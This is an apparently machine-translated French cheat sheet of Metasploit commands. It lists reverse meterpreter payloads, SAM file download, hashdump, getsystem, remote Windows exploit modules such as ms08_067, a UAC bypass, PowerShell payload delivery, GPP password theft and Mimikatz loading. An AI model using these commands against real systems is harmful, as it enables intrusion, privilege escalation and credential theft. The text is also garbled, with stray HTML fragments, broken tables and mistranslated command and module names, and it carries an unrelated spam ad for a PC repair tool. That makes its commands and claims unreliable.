Liste des commandes Metasploit (2021)-Utilisez Metasploit comme un pro!
Vous souhaitez utiliser Metasploit Pro Framework ou Metasploit Unleashed ? Eh bien, vous devrez d’abord connaître leurs commandes !. Ci-dessous, nous partageons avec vous la dernière liste des commandes Metasploit de 2021 . Cette feuille de triche contient toutes les commandes dont vous aurez besoin, des bases pour avancer!
Trouvez et réparez automatiquement les erreurs de Windows grâce à l'outil de réparation de PC
Reimage est un excellent outil de réparation qui détecte et répare automatiquement différents problèmes du système d'exploitation Windows. Avoir cet outil protégera votre PC contre les codes malveillants, les défaillances matérielles et plusieurs autres bugs. En outre, cela vous permet également d'utiliser votre appareil au maximum de ses capacités et de ses performances.
- Étape 1: Télécharger l'outil de réparation et d'optimisation des PC (Windows 11, 10, 8, 7, XP, Vista - Certifié Microsoft Gold).
- Étape 2: Cliquez sur "Démarrer l'analyse" pour trouver les problèmes de registre de Windows qui pourraient être à l'origine des problèmes du PC.
- Étape 3: Cliquez sur "Réparer tout" pour résoudre tous les problèmes.
Dans ce guide, nous parlerons des bases de la feuille de triche des commandes Metasploit qui peut être utilisé dans l’interface de ligne de commande. Il existe également de nombreuses autres consoles de ligne de commande disponibles sur Internet (telles que MSFConsole Command Line ) mais elles sont vraiment difficiles à utiliser et à comprendre.
Qu’est-ce que Metasploit Framework?
Metasploit est un produit qui peut être utilisé pour s’introduire dans un système distant et qui peut également être utilisé pour tester la vulnérabilité d’un système informatique. Comme tous les autres outils de sécurité de l’information, Metasploit peut également être utilisé à ces deux fins (activités non autorisées et légitimes). Le Rapid7 a également ajouté les deux éditions ou versions propriétaires appelées Metasploit Pro et Metasploit Express. Vous pouvez également voir certaines de nos commandes de Kali Linux Terminal pour le piratage.
Metasploit met en évidence le risque et la correction de bogues particuliers qui pourraient être disponibles sur votre ordinateur personnel (PC). Plus tard, l’outil de fuzzing a également été inclus dans le Metasploit 3.0 qui a été utilisé pour découvrir les vulnérabilités des logiciels même avec les exploits pour les bogues connus. Après un certain temps, le jeu d’outils sans fil lorcon (802.11) a également été ajouté au Metasploit 3.0 au mois de novembre 2006. Après toutes ces mises à jour, le Rapid7 a sorti Metasploit 4.0 au mois d’août 2011.
Vous pouvez récupérez Metasploit Pro Framework à partir de la page ci-dessous:
Téléchargez Metasploit Pro Framework gratuitement
Une brève histoire de Metasploit Framework
H. D. Moore a été le créateur de cet outil réseau portable nommé Metasploit utilisant Perl en 2003. En 2007, le Framework Metasploit a été totalement réécrit dans le Ruby. Le 21 er octobre 2009, le Metasploit a annoncé avoir été acheté ou acquis par le Rapid7. Rapid7 est une société de sécurité qui fournit de nombreux types de solutions unifiées de gestion des vulnérabilités.
Liste des dernières commandes Metasploit 2021 (nouveau)
- Meterpreter Payloads:
- Charge utile de Windows reverse meterpreter
Commande | Description de CMD |
set payload windows/meterpreter/reverse_tcp | Windows reverse tcp payload |
Charge utile Windows VNC pour Meterpreter
Commande | Description de CMD |
set payload windows/vncinject/reverse_tcpset ViewOnly false | Meterpreter Windows VNC Payload
|
Charge utile Linux Reverse Meterpreter
Commande | Description de CMD |
set payload linux/meterpreter/reverse_tcp | Meterpreter Linux Reverse Payload |
Commandes Meterpreter Cheat Sheet (2021 dernières)
Meterpreter télécharger le fichier à partir de la cible Windows < tr> portfwd delete –l 3389 –p 3389 –r cible Meterpreter supprime la fonction de transfert de port
Commande | Description de CMD |
télécharger le fichier c: \\ windows | Meterpreter télécharge le fichier vers la cible Windows machine |
télécharger c: \\ windows \\ repair \\ sam/tmp | |
télécharger c: \\ windows \\ repair \\ sam/tmp | Meterpreter télécharge les fichiers depuis la machine cible Windows |
exécute-fc: \\ windo ws\temp\exploit.exe | Meterpreter exécute .exe sur la cible-pratique pour exécuter les exploits téléchargés |
execute-f cmd-c | Crée un nouveau canal à l’aide du shell cmd |
ps | Meterpreter vous montre les processus actuels qui sont en cours d’exécution |
shell | Meterpreter obtient l’accès shell sur la machine ou le serveur cible |
getsystem | Meterpreter tente de faire remonter les privilèges pour accéder à la cible |
hashdump | Meterpreter tente de vider les hachages sur la cible |
portfwd add –L 3389 –p 3389 –r cible | Meterpreter crée un transfert de port vers la machine cible |
Modules Metasploit communs et Modules Windows Metasploit à distance
Modules Metasploit Windows locaux Modules Metasploit auxiliaires utiliser un outil auxiliaire/scanner/mssql/mssql_login Metasploit MSSQL Credential Scanner utiliser le scanner auxiliaire/mysql/mysql_version Lire aussi: Le guide parfait de DDoS comme un hacker professionnel. Modules Metasploit PowerShell Post-Exploit Windows Metasploit Modules exécuter post/windows/rassembler/win_privs privilèges d’affichage Metasploit de l’utilisateur actuel Source: TheHackToday Les commandes de base de Metasploit que vous devez connaître en 2021 La commande Metasploit pour la mise à jour du Framework: La commande suivante mentionnée ci-dessus fournit la dernière version du Framework Metasploit mis à jour. La mise à jour indique ce qui suit que nous devons mettre à jour la mise à jour hebdomadaire de la copie de notre Framework Metasploit. Mais il y a un léger inconvénient à cette commande et c’est que l’exécution de cette commande peut corrompre ou casser la copie de votre logiciel qui est installée sur votre PC. Lecture recommandée : Haut 8 Meilleures distributions Linux pour le piratage et les tests de pénétration! Commandes Metasploit msfhelp/console: Lorsque vous exécutez Metasploit pour la première fois, la fenêtre suivante s’ouvre sur votre écran. Si vous ne savez rien ou n’avez aucune information relative au Metasploit, vous pouvez simplement taper: help pour afficher toutes les commandes et informations relatives au Metasploit.Je ne vais pas perdre votre temps en expliquant toutes les commandes sur le Metasploit mais je vais discuter de certaines des commandes de base et les plus utilisées que vous allez utiliser principalement.
- Commandes de base: Ces commandes sont utilisées pour rechercher, utiliser , Back, Help, Info et Exit.
- Commandes d’exploit: ces commandes sont utilisées pour définir des variables et afficher les options d’exploitation et les options d’évasion, les charges utiles et les encodeurs.
- Commandes d’exécution d’exploit : Ces commandes sont utilisées pour exécuter et exécuter des exploits contre une cible spécifique.
Commandes Metasploit plus utiles:
- Commande de recherche:
Cette commande est utilisée pour rechercher différents types ou sortes de vulnérabilités et d’exploits provenant du msfconsole.
- Commande Info:
Cette commande est utilisée pour garder un œil sur la documentation et jeter un œil au propriétaire de l’exploit. Lire: 8 meilleures façons de sécuriser votre serveur Linux (Linux Hardening Guide 2021).
- Commande Afficher les options :
Avec l’aide de cette commande simple, nous pouvons utiliser les commandes show pour afficher toutes les valeurs requises par la charge utile qui peuvent ensuite être utilisées pour attaquer le PC ou la machine victime que nous voulons attaquer.
- LHOST :
Avec l’aide de cette commande, vous pouvez facilement effectuer l’attaque du réseau WAN, il vous suffit de définir le LHOST sur l’adresse IP statique IP et tous les autres ports de transfert.
- LPORT :
Si vous essayez sur le réseau LAN, vous n’avez pas besoin d’effectuer la redirection de port mais vous pouvez utiliser n’importe quel port que vous souhaitez utiliser. Mais si vous attaquez le réseau WAN, vous devez transférer le port que vous souhaitez attaquer respectivement.
- Afficher les charges utiles :
Avec l’aide de cette commande, nous utilisons la commande show payloads. Cette commande renverra une liste complète de charges utiles compatibles pour l’exploit suivant. Dans l’image suivante, Metasploit a chargé de nombreuses charges utiles compatibles:
- Afficher les cibles:
Cette commande renverra une liste complète des systèmes d’exploitation très vulnérables à l’exploit sélectionné ou choisi. Après avoir exécuté cette commande, nous obtenons la sortie suivante de l’exploit suivant: exploit adobe_flash_shader_drawing_fill.
- Show Advanced:
En utilisant cette commande show advanced, nous pouvons afficher toutes les options avancées pour les exploits requis. Télécharger: Logiciel Nessus Professional Vulnerability Scanner.
- Afficher les encodeurs:
Cette commande est utilisée pour renvoyer tous les encodeurs compatibles. Ces encodeurs sont utilisés pour contourner les signatures IDS/IPS simples qui ont été recherchées pour certains octets de la charge utile disponibles.
- Show nops:
Cette commande renverra une liste complète des générateurs NOP. NOP est l’abréviation de No Operation et est utilisé pour changer le modèle pour contourner les IDS/IPS simples des traîneaux NOP courants. Ces générateurs NOP commencent avec toute une configuration d’architecture CPU dans son nom. Télécharger: Acunetix Web Vulnerability Scanner Free.Vous pouvez visiter le site officiel Offensive Security pour les commandes AZ Metasploit complètes. Connaissez-vous d’autres commandes Metasploit que nous pouvons ajouter à cette liste? Dans cet article, nous avons discuté de la Liste des commandes Metasploit en 2021 , nous avons également parlé de nombreuses commandes différentes que vous pouvez utiliser pour effectuer diverses tâches et toutes les différentes fonctionnalités. C’est une méthode totalement sûre pour utiliser et effectuer la vérification de vulnérabilité et pour résoudre tous ces problèmes connexes. J’espère que ce guide vous sera vraiment utile. Partagez-le avec vos amis et votre famille pour les aider à résoudre leurs problèmes. Si vous avez des questions, laissez-les dans la section des commentaires. Nous sommes toujours là pour vous aider si vous avez besoin d’aide.
Commande | Description de CMD | |
use exploit/windows/smb/ms08_067_netapi | MS08_067 Exploit à distance Windows 2k, XP, 2003 | |
use exploit/windows/dcerpc/ms06_040_netapi | MS08_040 Windows NT, 2k, XP, 2003 Exploit à distance | |
use exploit/windows/smb/ ms09_050_smb2_negotiate_func_index |
MS09_050 Windows Vista SP1/Exploit à distance SP2 et Server 2008 (x86) | |
Commande | Description de CMD | |
utilisez exploit/windows/local/bypassuac | Contourner l’UAC sous Windows 7 + Définir cible + arch, x86/64 | |
Commande | Description de CMD | |
use auxiliaire/scanner/http/dir_scanner | Scanner de répertoires HTTP Metasploit | |
utiliser le/scanner auxiliaire/http/jboss_vulnscan | Scanner de vulnérabilité Metasploit JBOSS | |
Metasploit MSSQL Version Scanner | utiliser auxiliaire/scanner/oracle/oracle_login | Module de connexion Oracle Metasploit |
Commande | Description de CMD | |
use exploit/multi/script/web_delivery | Module de livraison de charge utile Metasploit PowerShell | |
post/windows/manage/powershell/exec_powershell | Metasploit upload et exécute le script PowerShell via une session | |
use exploit/multi/http/jboss_maindeployer | Metasploit JBOSS deploy | |
utiliser exploit/windows/mssql/mssql_payload | Metasploit MSSQL payload | |
Commande | Description de CMD | |
utiliser post/windows/collecte/credentials/gpp | Metasploit saisit les mots de passe enregistrés GPP | |
oad mimikatz-u0026 gt; wdigest | Metasplit load Mimikatz | |
run post/windows/together/local_admin_search_enum | Identifiez les autres machines auxquelles l’utilisateur du domaine fourni a un accès administratif | |
mise à jour apt; apt install metasploit-framework |